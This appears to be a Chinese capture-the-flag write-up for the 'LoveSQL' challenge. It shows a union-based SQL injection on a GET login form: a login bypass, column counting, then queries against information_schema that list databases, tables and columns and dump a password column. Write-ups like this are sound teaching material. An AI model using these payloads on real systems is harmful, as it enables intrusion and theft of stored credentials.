[极客大挑战 2019]LoveSQL wp
打开页面是这样的,我们先试试万能密码
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/fc35e37e3eddaaa433e6494fc260c61a.png)
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/6edd0c6db41eb23195a1f4411dc15b9b.png)
显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。
首先我们来查列数,注入
?username=admin&password=123 %27 order by 4%23
发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句
?username=admin&password=123 %27 union select 1,2,3 %23
找到注入点是2,3 我们先试试3,借助我们爆数据库,注入语句
?username=admin&password=123 %27 union select 1,2,group_concat(schema_name)%20from%20information_schema.schemata%23 %23
爆出数据库'information_schema,mysql,performance_schema,test,geek'
继续我们猜测flag会在geek里,那么我们继续爆表名,注入语句
?username=admin&password=123 %27 union select 1,2,group_concat(table_name)%20from%20information_schema.tables where table_schema='geek'%23
爆出了表名'geekuser,l0ve1ysq1'
,接下来我们爆字段名,我们试一下l0ve1ysq1,注入语句
?username=admin&password=123 %27 union select 1,2,group_concat(column_name)%20from%20information_schema.columns where table_name='l0ve1ysq1'%23
得到字段名'id,username,password'
,我们试一下password
,爆出这个字段的数据,注入语句
?username=admin&password=123 %27 union select 1,2,group_concat(concat_ws(0x23,password)) from geek.l0ve1ysq1%23
得到flag,比较简单,就是常规的sql注入,一步一步按照步骤来就好。